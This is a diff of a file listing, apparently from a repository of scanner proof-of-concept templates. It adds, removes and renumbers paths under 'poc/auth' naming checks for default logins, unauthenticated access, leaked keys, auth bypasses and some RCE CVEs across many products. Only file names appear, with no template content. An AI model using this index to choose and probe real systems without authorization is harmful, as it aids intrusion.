-2371,7 +2392,6 @@ ./poc/auth/gophish-default-login-7792.yaml ./poc/auth/gophish-default-login-7793.yaml ./poc/auth/gophish-default-login-7794.yaml -./poc/auth/gophish-default-login.yaml ./poc/auth/gophish-login-7795.yaml ./poc/auth/gophish-login.yaml ./poc/auth/grafana-api-key-exposure.yaml @@ -2385,19 +2405,19 @@ ./poc/auth/grafana-default-login-7801.yaml ./poc/auth/grafana-default-login-7802.yaml ./poc/auth/grafana-default-login-7803.yaml +./poc/auth/grafana-default-login-7804.yaml ./poc/auth/grafana-default-password.yaml ./poc/auth/grafana-default-password.yml ./poc/auth/grafana-login.yml ./poc/auth/grafana-public-signup-7814.yaml ./poc/auth/grafana-public-signup-7815.yaml +./poc/auth/grafana-public-signup-7816.yaml ./poc/auth/grafana-public-signup-7817.yaml ./poc/auth/grafana-public-signup.yaml ./poc/auth/graphite-browser-default-credential.yaml ./poc/auth/grav-register-admin.yaml ./poc/auth/gryphon-login.yaml -./poc/auth/gt-ac2900-login.yaml ./poc/auth/guacamole-default-login-7858.yaml -./poc/auth/guacamole-default-login-7859.yaml ./poc/auth/guacamole-default-login-7860.yaml ./poc/auth/guacamole-default-login-7861.yaml ./poc/auth/guest-author-25a9f786708949ed3cefc36430f46236.yaml @@ -2419,7 +2439,6 @@ ./poc/auth/hadoop-unauth-1.yaml ./poc/auth/hadoop-unauth-2.yaml ./poc/auth/hadoop-unauth-7875.yaml -./poc/auth/hadoop-unauth-7877.yaml ./poc/auth/hadoop-unauth.yaml ./poc/auth/hadoop-unauthenticated-access.yaml ./poc/auth/hadoop-yarn-unauth.yaml @@ -2443,7 +2462,6 @@ ./poc/auth/hikvision-unauthenticated-rce-cve-2021-36260.yml ./poc/auth/hivemanager-login-panel-7963.yaml ./poc/auth/hivemanager-login-panel-7964.yaml -./poc/auth/hivemanager-login-panel-7965.yaml ./poc/auth/hivemanager-login-panel-7966.yaml ./poc/auth/hivemanager-login-panel.yaml ./poc/auth/homeworks-illumination-web-keypad.yaml @@ -2466,24 +2484,23 @@ ./poc/auth/hp-ilo-serial-key-disclosure-8022.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8023.yaml ./poc/auth/hp-ilo-serial-key-disclosure-8024.yaml +./poc/auth/hp-ilo-serial-key-disclosure-8025.yaml ./poc/auth/hp-switch-default-login-8035.yaml ./poc/auth/hp-switch-default-login-8037.yaml ./poc/auth/hp-switch-default-login-8038.yaml -./poc/auth/hp-switch-default-login.yaml -./poc/auth/hpe-system-management-login-8014.yaml ./poc/auth/hpe-system-management-login-8015.yaml +./poc/auth/hpe-system-management-login-8016.yaml ./poc/auth/hpe-system-management-login.yaml +./poc/auth/hrsale-unauthenticated-lfi-8039.yaml ./poc/auth/hrsale-unauthenticated-lfi-8040.yaml ./poc/auth/hrsale-unauthenticated-lfi-8041.yaml -./poc/auth/hrsale-unauthenticated-lfi.yaml ./poc/auth/htpasswd-detection-8045.yaml -./poc/auth/htpasswd-detection-8046.yaml ./poc/auth/htpasswd-detection.yaml ./poc/auth/htpasswd.yaml ./poc/auth/http-auth-141b1b9924040b19c483025ca3d106e1.yaml ./poc/auth/http-auth.yaml -./poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/auth/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/auth/http-etcd-unauthenticated-api-data-leak.yaml ./poc/auth/http-username-password.yaml ./poc/auth/httponly-cookie-detect.yaml ./poc/auth/huawei-HG532e-default-login.yaml @@ -2494,10 +2511,10 @@ ./poc/auth/huawei-dg8045-home-gateway-password-leakage.yaml ./poc/auth/huawei-hg532e-default-router-login-8062.yaml ./poc/auth/huawei-hg532e-default-router-login-8063.yaml -./poc/auth/huawei-hg532e-default-router-login-8064.yaml ./poc/auth/huawei-router-auth-bypass-8073.yaml ./poc/auth/huawei-router-auth-bypass-8074.yaml ./poc/auth/huawei-router-auth-bypass-8075.yaml +./poc/auth/huawei-router-auth-bypass-8076.yaml ./poc/auth/hue-default-credential-8080.yaml ./poc/auth/hue-default-credential-8081.yaml ./poc/auth/hue-login-panel.yaml @@ -2508,11 +2525,11 @@ ./poc/auth/ibm-dsc-default-login.yaml ./poc/auth/ibm-hmc-default-login.yaml ./poc/auth/ibm-maximo-login.yaml -./poc/auth/ibm-mqseries-default-login-8107.yaml +./poc/auth/ibm-mqseries-default-login-8106.yaml ./poc/auth/ibm-mqseries-default-login-8108.yaml ./poc/auth/ibm-note-login-1.yaml ./poc/auth/ibm-note-login-2.yaml -./poc/auth/ibm-note-login-8110.yaml +./poc/auth/ibm-note-login-8111.yaml ./poc/auth/ibm-note-login-8112.yaml ./poc/auth/ibm-note-login.yaml ./poc/auth/ibm-signup-exposure-8119.yaml @@ -2524,7 +2541,7 @@ ./poc/auth/icc-pro-login.yaml ./poc/auth/icinga-web-login-8134.yaml ./poc/auth/icinga-web-login-8135.yaml -./poc/auth/icinga-web-login-8136.yaml +./poc/auth/icinga-web-login-8137.yaml ./poc/auth/icinga-web-login.yaml ./poc/auth/ictprotege-login-panel.yaml ./poc/auth/idemia-biometrics-default-credentials.yaml @@ -2537,11 +2554,11 @@ ./poc/auth/influxdb-unauth.yaml ./poc/auth/influxdb-unauth.yml ./poc/auth/inspur-clusterengine-default-login-8162.yaml +./poc/auth/inspur-clusterengine-default-login.yaml ./poc/auth/intelbras-login-8164.yaml ./poc/auth/intelbras-login.yaml ./poc/auth/intelliflash-login-panel.yaml ./poc/auth/iptime-default-login-8192.yaml -./poc/auth/iptime-default-login-8193.yaml ./poc/auth/iptime-default-login-8194.yaml ./poc/auth/issabel-login.yaml ./poc/auth/iubenda-cookie-law-solution-0f838161174c3a1452a42342cb556b62.yaml @@ -2561,9 +2578,10 @@ ./poc/auth/jboss-unauth.yml ./poc/auth/jellyseerr-login-panel.yaml ./poc/auth/jenkins-credentials-disclosure.yml +./poc/auth/jenkins-default-login.yaml ./poc/auth/jenkins-default-pwd.yaml -./poc/auth/jenkins-login-8277.yaml ./poc/auth/jenkins-login-8278.yaml +./poc/auth/jenkins-login-8279.yaml ./poc/auth/jenkins-login-8280.yaml ./poc/auth/jenkins-login-detection.yaml ./poc/auth/jenkins-login.yaml @@ -2572,20 +2590,19 @@ ./poc/auth/jenkins-unauthorized-access.yml ./poc/auth/jenkins-weak-password.yaml ./poc/auth/jfrog-login.yaml +./poc/auth/jfrog-unauth-build-exposed-8299.yaml ./poc/auth/jfrog-unauth-build-exposed-8300.yaml ./poc/auth/jfrog-unauth-build-exposed-8301.yaml -./poc/auth/jfrog-unauth-build-exposed-8302.yaml ./poc/auth/jfrog-unauth-build-exposed.yaml ./poc/auth/jfrog-unauth-panel.yaml ./poc/auth/jinher-oa-c6-default-password.yaml ./poc/auth/jinher-oa-c6-default-password.yml ./poc/auth/jinher-oa-default-login-8311.yaml -./poc/auth/jinher-oa-default-login-8312.yaml ./poc/auth/jira-login-default.yaml +./poc/auth/jira-service-desk-signup-8317.yaml ./poc/auth/jira-service-desk-signup-8318.yaml ./poc/auth/jira-service-desk-signup-8319.yaml ./poc/auth/jira-service-desk-signup-8320.yaml -./poc/auth/jira-service-desk-signup-8321.yaml ./poc/auth/jira-service-desk-signup.yaml ./poc/auth/jira-unauthenticated-adminprojects-8322.yaml ./poc/auth/jira-unauthenticated-dashboards-8323.yaml @@ -2596,30 +2613,30 @@ ./poc/auth/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8329.yaml ./poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml -./poc/auth/jira-unauthenticated-popular-filters-8331.yaml ./poc/auth/jira-unauthenticated-popular-filters.yaml ./poc/auth/jira-unauthenticated-projectcategories-8333.yaml ./poc/auth/jira-unauthenticated-projectcategories-8334.yaml -./poc/auth/jira-unauthenticated-projects-8335.yaml ./poc/auth/jira-unauthenticated-projects-8336.yaml +./poc/auth/jira-unauthenticated-projects.yaml ./poc/auth/jira-unauthenticated-resolutions-8337.yaml +./poc/auth/jira-unauthenticated-screens-8338.yaml ./poc/auth/jira-unauthenticated-screens-8339.yaml -./poc/auth/jira-unauthenticated-screens.yaml ./poc/auth/jira-unauthenticated-user-picker-8340.yaml ./poc/auth/jira-unauthenticated-user-picker-8341.yaml +./poc/auth/jira-unauthenticated-user-picker.yaml ./poc/auth/jira-unauthenticated.yaml ./poc/auth/jmx-default-login-8354.yaml -./poc/auth/jmx-default-login-8355.yaml ./poc/auth/jmx-default-login-8356.yaml +./poc/auth/jmx-default-login.yaml ./poc/auth/jmx-default-password.yaml ./poc/auth/jolokia-tomcat-creds-leak.yaml ./poc/auth/jolokia-unauthenticated-lfi-8364.yaml ./poc/auth/jolokia-unauthenticated-lfi-8365.yaml ./poc/auth/jolokia-unauthenticated-lfi-8366.yaml -./poc/auth/jolokia-unauthenticated-lfi.yaml ./poc/auth/jumpserver-unauth-rce.yaml ./poc/auth/jumpserver-unauth-rce.yml ./poc/auth/jumpserver-unauth.yaml +./poc/auth/jupyter-ipython-unauth-8402.yaml ./poc/auth/jupyter-ipython-unauth-8404.yaml ./poc/auth/jupyter-ipython-unauth-8405.yaml ./poc/auth/jupyter-ipython-unauth.yaml @@ -2638,6 +2655,7 @@ ./poc/auth/k8s-apiserver-unauthorized.yaml ./poc/auth/k8s-etcd-v3-unauthorized.yaml ./poc/auth/kafka-center-default-login-8415.yaml +./poc/auth/kafka-center-default-login-8416.yaml ./poc/auth/kafka-center-default-login-8417.yaml ./poc/auth/kafka-center-default-password.yaml ./poc/auth/kafka-center-login-8418.yaml @@ -2650,7 +2668,7 @@ ./poc/auth/keenetic-web-login-8441.yaml ./poc/auth/keenetic-web-login-8443.yaml ./poc/auth/keenetic-web-login.yaml -./poc/auth/kenesto-login-8444.yaml +./poc/auth/kenesto-login-8445.yaml ./poc/auth/kenesto-login.yaml ./poc/auth/kentico-login-8446.yaml ./poc/auth/kentico-login-8447.yaml @@ -2663,16 +2681,17 @@ ./poc/auth/keycloak-admin-panel.yaml ./poc/auth/keycloak-json-8471.yaml ./poc/auth/keycloak-json-8472.yaml +./poc/auth/keycloak-json-8473.yaml ./poc/auth/keycloak-json-8474.yaml ./poc/auth/keycloak-open-redirect.yaml ./poc/auth/keycloak-openid-config-1.yaml ./poc/auth/keycloak-openid-config-2.yaml -./poc/auth/keycloak-openid-config-8476.yaml +./poc/auth/keycloak-openid-config-8475.yaml ./poc/auth/keycloak-openid-config-8477.yaml +./poc/auth/keycloak-openid-config.yaml ./poc/auth/keycloak-workflow.yaml ./poc/auth/keycloak-xss-8478.yaml ./poc/auth/keycloak-xss-8479.yaml -./poc/auth/keycloak-xss-8480.yaml ./poc/auth/keycloak-xss-8481.yaml ./poc/auth/keycloak-xss-8482.yaml ./poc/auth/keycloak-xss.yaml @@ -2695,7 +2714,7 @@ ./poc/auth/kingdee-erp-getbusinessobjectdata-rce.yaml ./poc/auth/kingsoft-v8-default-password.yaml ./poc/auth/kingsoft-v8-default-password.yml -./poc/auth/kiwitcms-login-8497.yaml +./poc/auth/kiwitcms-login-8496.yaml ./poc/auth/kiwitcms-login.yaml ./poc/auth/knr-author-list-widget-8be38009c2b17ae1122861229dce91c1.yaml ./poc/auth/knr-author-list-widget-ae0eec4d1e798124605d3b7bb5ba68ee.yaml @@ -2713,10 +2732,11 @@ ./poc/auth/kubeflow-dashboard-unauth-8517.yaml ./poc/auth/kubeflow-dashboard-unauth.yaml ./poc/auth/kubernetes-etcd-keys.yaml -./poc/auth/kubernetes-unauth(1).yaml +./poc/auth/kubernetes-unauth.yaml ./poc/auth/kubernetes-unauth.yml ./poc/auth/kyan-credential-exposure-8554.yaml ./poc/auth/kyan-credential-exposure.yaml +./poc/auth/kyan-network-credentials-disclosure-8556.yaml ./poc/auth/kyan-network-credentials-disclosure.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yaml ./poc/auth/kyan-network-monitoring-account-password-leakage.yml @@ -2907,7 +2927,6 @@ ./poc/auth/loqate-api-key.yaml ./poc/auth/lucee-login-1.yaml ./poc/auth/lucee-login-2.yaml -./poc/auth/lucee-login-8662.yaml ./poc/auth/lucee-login-8663.yaml ./poc/auth/lucee-login-8664.yaml ./poc/auth/lucee-login-8665.yaml @@ -2930,6 +2949,7 @@ ./poc/auth/mach-proweb-login.yaml ./poc/auth/maestro-login-panel.yaml ./poc/auth/maian-cart-preauth-rce-8720.yaml +./poc/auth/maian-cart-preauth-rce-8721.yaml ./poc/auth/maian-cart-preauth-rce.yaml ./poc/auth/maike-ras-cookie-bypass.yaml ./poc/auth/mailchimp-api-key-8722.yaml @@ -2943,14 +2963,13 @@ ./poc/auth/malware_cap_hookexkeylogger.yaml ./poc/auth/manageengine-keymanagerplus.yaml ./poc/auth/mantisbt-default-credential-8778.yaml -./poc/auth/mantisbt-default-credential-8779.yaml ./poc/auth/mapbox-token-disclosure.yaml ./poc/auth/mapbox-token.yaml ./poc/auth/matomo-login-portal.yaml ./poc/auth/meks-smart-author-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/auth/meks-smart-author-widget.yaml -./poc/auth/meshcentral-login-8801.yaml ./poc/auth/meshcentral-login-8802.yaml +./poc/auth/meshcentral-login-8803.yaml ./poc/auth/meshcentral-login.yaml ./poc/auth/metersphere-login.yaml ./poc/auth/micro-focus-ucmdb-default-credentials-8843.yaml @@ -2963,7 +2982,6 @@ ./poc/auth/minio-default-login-1.yaml ./poc/auth/minio-default-login-2.yaml ./poc/auth/minio-default-login-8887.yaml -./poc/auth/minio-default-login-8888.yaml ./poc/auth/minio-default-login-8889.yaml ./poc/auth/minio-default-password-1.yaml ./poc/auth/minio-default-password-2.yaml @@ -3065,7 +3083,6 @@ ./poc/auth/mongodb-unauth-8926.yaml ./poc/auth/mongodb-unauth-8927.yaml ./poc/auth/mongodb-unauth-8928.yaml -./poc/auth/mongodb-unauth.yaml ./poc/auth/moodle-auth-xss.yaml ./poc/auth/movable-type-login-1.yaml ./poc/auth/movable-type-login-2.yaml @@ -3107,10 +3124,10 @@ ./poc/auth/nagios-default-credential-8989.yaml ./poc/auth/nagios-default-credential.yaml ./poc/auth/nagios-default-login-8990.yaml -./poc/auth/nagios-default-login-8991.yaml ./poc/auth/nagios-default-login-8992.yaml ./poc/auth/nagios-default-login-8993.yaml ./poc/auth/nagios-default-login-8994.yaml +./poc/auth/nagios-default-login.yaml ./poc/auth/naver-login-phish.yaml ./poc/auth/netauth.yaml ./poc/auth/netdata-unauth.yaml @@ -3129,7 +3146,7 @@ ./poc/auth/netsus-default-login-9058.yaml ./poc/auth/netsus-default-login-9059.yaml ./poc/auth/netsus-default-login.yaml -./poc/auth/netsus-server-login-9062.yaml +./poc/auth/netsus-server-login-9061.yaml ./poc/auth/netsus-server-login.yaml ./poc/auth/netsweeper-preauth-rce-workflow.yaml ./poc/auth/newrelic-admin-api-key-9071.yaml @@ -3170,9 +3187,11 @@ ./poc/auth/nuuno-network-login-9161.yaml ./poc/auth/nuuno-network-login-9162.yaml ./poc/auth/nuuno-network-login-9163.yaml +./poc/auth/nuuno-network-login-9164.yaml ./poc/auth/o2-default-password.yaml ./poc/auth/oauth-access-key-9184.yaml ./poc/auth/oauth-access-key-9185.yaml +./poc/auth/oauth-access-key-9186.yaml ./poc/auth/oauth-client-cd3ce5265515419eaa2f80ce50d80c3b.yaml ./poc/auth/oauth-client-for-user-authentication-1e787d9eb928d177bffbf4da69766c02.yaml ./poc/auth/oauth-client-for-user-authentication-8b8330bacdc4e03bd13b4255b2f9c8e2.yaml @@ -3187,6 +3206,7 @@ ./poc/auth/oauth-twitter-feed-for-developers-2c4a03e880aaa9ac7d131e8aec6fd5ff.yaml ./poc/auth/oauth-twitter-feed-for-developers.yaml ./poc/auth/oauth2-detect-9180.yaml +./poc/auth/oauth2-detect-9181.yaml ./poc/auth/oauth2-detect-9182.yaml ./poc/auth/oauth2-detect-9183.yaml ./poc/auth/oauth2-provider-2ae833691d89595113a94c5ad9ff28e0.yaml @@ -3206,7 +3226,8 @@ ./poc/auth/oauth2-server.yaml ./poc/auth/obf_token_smuggling.yml ./poc/auth/ocs-inventory-login.yaml -./poc/auth/octobercms-default-login-9193.yaml +./poc/auth/octobercms-default-login-9192.yaml +./poc/auth/octobercms-default-login.yaml ./poc/auth/octoprint-login-1.yaml ./poc/auth/octoprint-login-2.yaml ./poc/auth/octoprint-login-9197.yaml @@ -3261,11 +3282,11 @@ ./poc/auth/open-stack-dashboard-login-1.yaml ./poc/auth/open-stack-dashboard-login-2.yaml ./poc/auth/open-stack-dashboard-login-9321.yaml +./poc/auth/open-stack-dashboard-login-9322.yaml ./poc/auth/open-stack-dashboard-login-9323.yaml -./poc/auth/open-stack-dashboard-login-9324.yaml ./poc/auth/open-stack-dashboard-login.yaml ./poc/auth/openai-key.yaml -./poc/auth/openbmcs-secret-disclosure.yaml +./poc/auth/openbmcs-secret-disclosure-9260.yaml ./poc/auth/openemr-default-login-9270.yaml ./poc/auth/openemr-default-login.yaml ./poc/auth/openerp-default-password.yaml @@ -3279,7 +3300,7 @@ ./poc/auth/oracle-bi-default-credentials.yaml ./poc/auth/oracle-business-intelligence-password.yaml ./poc/auth/oracle-ebs-credentials-9364.yaml -./poc/auth/oracle-ebs-credentials-9365.yaml +./poc/auth/oracle-ebs-credentials-9366.yaml ./poc/auth/oracle-ebs-credentials-disclosure-9363.yaml ./poc/auth/oracle-ebs-credentials-disclosure.yaml ./poc/auth/oracle-ebs-credentials.yaml @@ -3289,15 +3310,15 @@ ./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml ./poc/auth/paloalto-networks-sso.yaml ./poc/auth/panabit-default-login-9437.yaml +./poc/auth/panabit-default-login-9438.yaml ./poc/auth/panabit-default-login-9439.yaml -./poc/auth/panabit-default-login-9440.yaml +./poc/auth/panabit-default-login.yaml ./poc/auth/panabit-default-password-9441.yaml ./poc/auth/panabit-default-password-9442.yaml ./poc/auth/panabit-default-password.yaml ./poc/auth/panabit-gateway-default-password.yaml ./poc/auth/panabit-gateway-default-password.yml ./poc/auth/panabit-ixcache-default-login-9443.yaml -./poc/auth/panabit-ixcache-default-login.yaml ./poc/auth/panabit-ixcache-default-password.yaml ./poc/auth/panabit-ixcache-default-password.yml ./poc/auth/panos-default-credentials.yaml @@ -3332,7 +3353,6 @@ ./poc/auth/pentaho-default-login-9478.yaml ./poc/auth/pentaho-default-login-9479.yaml ./poc/auth/pentaho-default-login-9480.yaml -./poc/auth/pentaho-default-login.yaml ./poc/auth/peoplenet-ikey.yaml ./poc/auth/peoplesoft-default-login.yaml ./poc/auth/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml @@ -3380,12 +3400,11 @@ ./poc/auth/pie-register.yaml ./poc/auth/pieregister-open-redirect-9577.yaml ./poc/auth/pieregister-open-redirect-9578.yaml -./poc/auth/pieregister-open-redirect.yaml +./poc/auth/pieregister-open-redirect-9579.yaml ./poc/auth/pieregister-plugin-open-redirect.yaml ./poc/auth/pinpoint-unauth-1.yaml ./poc/auth/pinpoint-unauth-2.yaml ./poc/auth/pinpoint-unauth-9588.yaml -./poc/auth/pinpoint-unauth-9590.yaml ./poc/auth/pinpoint-unauth.yaml ./poc/auth/plainview-protect-passwords-64631f7e755eb94d7c99500d0510ac42.yaml ./poc/auth/plainview-protect-passwords-79caa4f8ea1fa3260f686401ac5493b5.yaml @@ -3411,7 +3430,7 @@ ./poc/auth/postman-api-key-disclosure.yaml ./poc/auth/postman-login-check.yaml ./poc/auth/private-key (copy 1).yaml -./poc/auth/private-key-9656.yaml +./poc/auth/private-key-9655.yaml ./poc/auth/private-key-9657.yaml ./poc/auth/private-key-9658.yaml ./poc/auth/private-key-exposure-9654.yaml @@ -3434,7 +3453,7 @@ ./poc/auth/pure-storage-login.yaml ./poc/auth/putty-private-key-disclosure-9729.yaml ./poc/auth/putty-private-key-disclosure-9730.yaml -./poc/auth/putty-private-key-disclosure-9732.yaml +./poc/auth/putty-private-key-disclosure-9731.yaml ./poc/auth/putty-private-key-disclosure.yaml ./poc/auth/putty-user-keyfile.yaml ./poc/auth/pypi-token.yaml @@ -3456,26 +3475,22 @@ ./poc/auth/rabbitmq-default-login-9783.yaml ./poc/auth/rabbitmq-default-login-9784.yaml ./poc/auth/rabbitmq-default-login-9785.yaml -./poc/auth/rabbitmq-default-login-9786.yaml -./poc/auth/rabbitmq-default-login.yaml ./poc/auth/rabbitmq-default-password.yaml ./poc/auth/rabbitmq-default-password.yml ./poc/auth/rabbitmq-missing-auth.yaml ./poc/auth/racksnet-login.yaml ./poc/auth/rails-secret-token-disclosure-9808.yaml -./poc/auth/rails-secret-token-disclosure-9809.yaml +./poc/auth/rails-secret-token-disclosure-9810.yaml ./poc/auth/rails-secret-token-disclosure.yaml ./poc/auth/rails-secret-token.yaml ./poc/auth/rainloop-default-login-9811.yaml ./poc/auth/rainloop-default-login-9812.yaml -./poc/auth/rainloop-default-login-9813.yaml ./poc/auth/rainloop-default-login.yaml ./poc/auth/rancher-default-login-9814.yaml -./poc/auth/rancher-default-login-9815.yaml ./poc/auth/rancher-default-login-9816.yaml +./poc/auth/rancher-default-login.yaml ./poc/auth/rancher-default-password.yaml -./poc/auth/ranger-default-login-9827.yaml -./poc/auth/ranger-default-login-9828.yaml +./poc/auth/ranger-default-login.yaml ./poc/auth/raw-cookie-reuse.yaml ./poc/auth/real-cookie-banner-1dba91bdd70cfd02be29db46dcf540b8.yaml ./poc/auth/real-cookie-banner-2ba39ea793cd92ced5c4447d57e663b5.yaml @@ -3518,8 +3533,8 @@ ./poc/auth/remedy-axis-login.yaml ./poc/auth/remote-auth-timeout.yaml ./poc/auth/remote-authentication-timeout-not-set.yaml -./poc/auth/remote-ui-login-9859.yaml ./poc/auth/remote-ui-login-9860.yaml +./poc/auth/remote-ui-login-9861.yaml ./poc/auth/remote-ui-login.yaml ./poc/auth/remove-footer-credit-5bd4d1e71d43f255dd64dca60d2b58a3.yaml ./poc/auth/remove-footer-credit-75ba687f2ebdd2e6fce2334821f6685b.yaml @@ -3533,9 +3548,10 @@ ./poc/auth/responsive-cookie-consent-c5ab2a03e0359e1ebdebd2347f5943f3.yaml ./poc/auth/responsive-cookie-consent.yaml ./poc/auth/retool-login.yaml +./poc/auth/ricoh-weak-password-9880.yaml ./poc/auth/ricoh-weak-password-9881.yaml -./poc/auth/ricoh-weak-password-9882.yaml ./poc/auth/ricoh-weak-password-9883.yaml +./poc/auth/ricoh-weak-password.yaml ./poc/auth/robomongo-credential-1.yaml ./poc/auth/robomongo-credential-2.yaml ./poc/auth/robomongo-credential-9884.yaml @@ -3546,10 +3562,11 @@ ./poc/auth/rockmongo-default-login-9898.yaml ./poc/auth/rockmongo-default-login-9899.yaml ./poc/auth/rockmongo-default-login-9900.yaml -./poc/auth/rockmongo-default-login.yaml ./poc/auth/rockmongo-default-password.yaml ./poc/auth/rockmongo-default-password.yml ./poc/auth/routeros-login-9909.yaml +./poc/auth/routeros-login.yaml +./poc/auth/rseenet-default-login-9913.yaml ./poc/auth/rseenet-default-login-9914.yaml ./poc/auth/rseenet-default-login-9915.yaml ./poc/auth/rseenet-default-password.yaml @@ -3573,9 +3590,9 @@ ./poc/auth/rundeck-login.yaml ./poc/auth/ruoyi-cms-unauth.yaml ./poc/auth/ruoyi-druid-unauth.yaml -./poc/auth/saferoads-vms-login-9970.yaml ./poc/auth/saferoads-vms-login-9971.yaml ./poc/auth/saferoads-vms-login-9972.yaml +./poc/auth/saferoads-vms-login-9973.yaml ./poc/auth/saferoads-vms-login-9974.yaml ./poc/auth/saferoads-vms-login.yaml ./poc/auth/sagem-2604-password-disclosure.yaml @@ -3597,6 +3614,7 @@ ./poc/auth/sangfor-edr-auth-bypass-10022.yaml ./poc/auth/sangfor-edr-auth-bypass-10023.yaml ./poc/auth/sangfor-edr-auth-bypass-10024.yaml +./poc/auth/sangfor-edr-auth-bypass.yaml ./poc/auth/sangfor-report-rep-login-rce.yaml ./poc/auth/sangfor-vpn-supersession-rce.yaml ./poc/auth/sas-login-panel.yaml @@ -3607,12 +3625,13 @@ ./poc/auth/sauter-login.yaml ./poc/auth/scriptcase-prod-login.yaml ./poc/auth/seagate-nas-login.yaml -./poc/auth/seats-login-10104.yaml ./poc/auth/seats-login-10105.yaml ./poc/auth/seats-login-10106.yaml +./poc/auth/seats-login-10107.yaml ./poc/auth/seats-login-10108.yaml ./poc/auth/seats-login.yaml ./poc/auth/secnet-ac-default-login-10113.yaml +./poc/auth/secnet-ac-default-login.yaml ./poc/auth/secnet-ac-default-password.yaml ./poc/auth/secnet-ac-default-password.yml ./poc/auth/secret-patterns-db.yaml @@ -3648,15 +3667,16 @@ ./poc/auth/seeyon-session-leak.yaml ./poc/auth/seeyon-session-leak.yml ./poc/auth/seeyon-unauth.yaml -./poc/auth/sendgrid-api-key-10140.yaml ./poc/auth/sendgrid-api-key-10141.yaml +./poc/auth/sendgrid-api-key-10142.yaml +./poc/auth/sendgrid-api-key.yaml ./poc/auth/seo-panel-reset-password-xss.yaml ./poc/auth/sequoiadb-default-login-10150.yaml -./poc/auth/sequoiadb-default-login-10151.yaml +./poc/auth/sequoiadb-default-login-10152.yaml ./poc/auth/sequoiadb-login.yaml -./poc/auth/server-backup-login-10153.yaml ./poc/auth/server-backup-login-10154.yaml ./poc/auth/server-backup-login-10155.yaml +./poc/auth/server-backup-login-10156.yaml ./poc/auth/server-backup-login.yaml ./poc/auth/server-backup-manager-se-login-detect.yaml ./poc/auth/server-private-keys-1.yaml @@ -3684,15 +3704,15 @@ ./poc/auth/service-account-credentials.yaml ./poc/auth/service-pwd-10176.yaml ./poc/auth/service-pwd-10177.yaml -./poc/auth/service-pwd-10178.yaml ./poc/auth/service-pwd-10179.yaml ./poc/auth/servicedesk-login-panel-1.yaml +./poc/auth/servicedesk-login-panel-10171.yaml ./poc/auth/servicedesk-login-panel-10172.yaml -./poc/auth/servicedesk-login-panel-10173.yaml ./poc/auth/servicedesk-login-panel-2.yaml ./poc/auth/servicedesk-login-panel.yaml ./poc/auth/servicenow-helpdesk-credential-10174.yaml ./poc/auth/servicenow-helpdesk-credential-10175.yaml +./poc/auth/servicenow-helpdesk-credential.yaml ./poc/auth/session-leak.yaml ./poc/auth/set-and-secure-passwords.yaml ./poc/auth/sexy-author-bio-6477bf18cad6c823db485408d49b337b.yaml @@ -3704,29 +3724,30 @@ ./poc/auth/sftp-credentials-exposure-2.yaml ./poc/auth/sgp-login-panel-10182.yaml ./poc/auth/sgp-login-panel-10183.yaml -./poc/auth/sgp-login-panel-10184.yaml ./poc/auth/sgp-login-panel-10185.yaml +./poc/auth/sgp-login-panel-10186.yaml ./poc/auth/sgp-login-panel.yaml +./poc/auth/sharecenter-login-10187.yaml ./poc/auth/sharecenter-login-10188.yaml -./poc/auth/sharecenter-login-10189.yaml ./poc/auth/sharecenter-login-10190.yaml ./poc/auth/sharecenter-login.yaml ./poc/auth/shikongzhiyou-erp-login-fileread.yaml ./poc/auth/shikongzhiyou-login_fileread.yaml ./poc/auth/shiro-124-rememberme.yaml -./poc/auth/shopify-custom-token-10198.yaml +./poc/auth/shopify-custom-token(1).yaml +./poc/auth/shopify-custom-token-11860.yaml ./poc/auth/shopify-custom-token.yaml ./poc/auth/shopify-legacy-private-app-token.yaml -./poc/auth/shopify-private-token-10199.yaml ./poc/auth/shopify-private-token-11861.yaml ./poc/auth/shopify-private-token.yaml ./poc/auth/shopify-shared-secret-10200.yaml +./poc/auth/shopify-shared-secret-11862.yaml ./poc/auth/shopify-shared-secret.yaml ./poc/auth/shopify-token-10205.yaml ./poc/auth/shopify-token.yaml ./poc/auth/shoppable-token-10206.yaml ./poc/auth/shoppable-token-10207.yaml -./poc/auth/shoppable-token-10209.yaml +./poc/auth/shoppable-token-10208.yaml ./poc/auth/showdoc-default-login-10219.yaml ./poc/auth/showdoc-default-login-10220.yaml ./poc/auth/showdoc-default-login-10221.yaml @@ -3771,8 +3792,8 @@ ./poc/auth/sitefinity-login-10299.yaml ./poc/auth/sitefinity-login.yaml ./poc/auth/siteomat-login-10300.yaml -./poc/auth/siteomat-login-10301.yaml ./poc/auth/siteomat-login-10302.yaml +./poc/auth/siteomat-login-10303.yaml ./poc/auth/siteomat-login.yaml ./poc/auth/sky-login-redirect-557dfeac01daa0367c681069c19d386e.yaml ./poc/auth/sky-login-redirect-6477bf18cad6c823db485408d49b337b.yaml @@ -3781,7 +3802,7 @@ ./poc/auth/slack-api-token.yaml ./poc/auth/slack-bot-token-10310.yaml ./poc/auth/slack-bot-token-10311.yaml -./poc/auth/slack-bot-token-10312.yaml +./poc/auth/slack-bot-token-10313.yaml ./poc/auth/slack-user-token-10314.yaml ./poc/auth/slack-webhook-token-10315.yaml ./poc/auth/slocum-login-10317.yaml @@ -3816,12 +3837,11 @@ ./poc/auth/somfy-login.yaml ./poc/auth/sonarqube-cred.yaml ./poc/auth/sonarqube-cve-2020-27986-unauth.yml +./poc/auth/sonarqube-login-10374.yaml ./poc/auth/sonarqube-login-10375.yaml -./poc/auth/sonarqube-login-10376.yaml ./poc/auth/sonarqube-login.yaml ./poc/auth/sonarqube-token-10381.yaml ./poc/auth/sonarqube-token-10382.yaml -./poc/auth/sonarqube-token.yaml ./poc/auth/sonic-wall-login.yaml ./poc/auth/sonicwall-analyzer-login.yaml ./poc/auth/sophos-xg115w-firewall-mr-10-authentication.yaml @@ -3848,7 +3868,7 @@ ./poc/auth/sphider-login-3.yaml ./poc/auth/sphider-login.yaml ./poc/auth/splunk-enterprise-login-panel.yaml -./poc/auth/splunk-enterprise-login-panel.yml +./poc/auth/splunk-login-10416.yaml ./poc/auth/splunk-login-10417.yaml ./poc/auth/splunk-login-10418.yaml 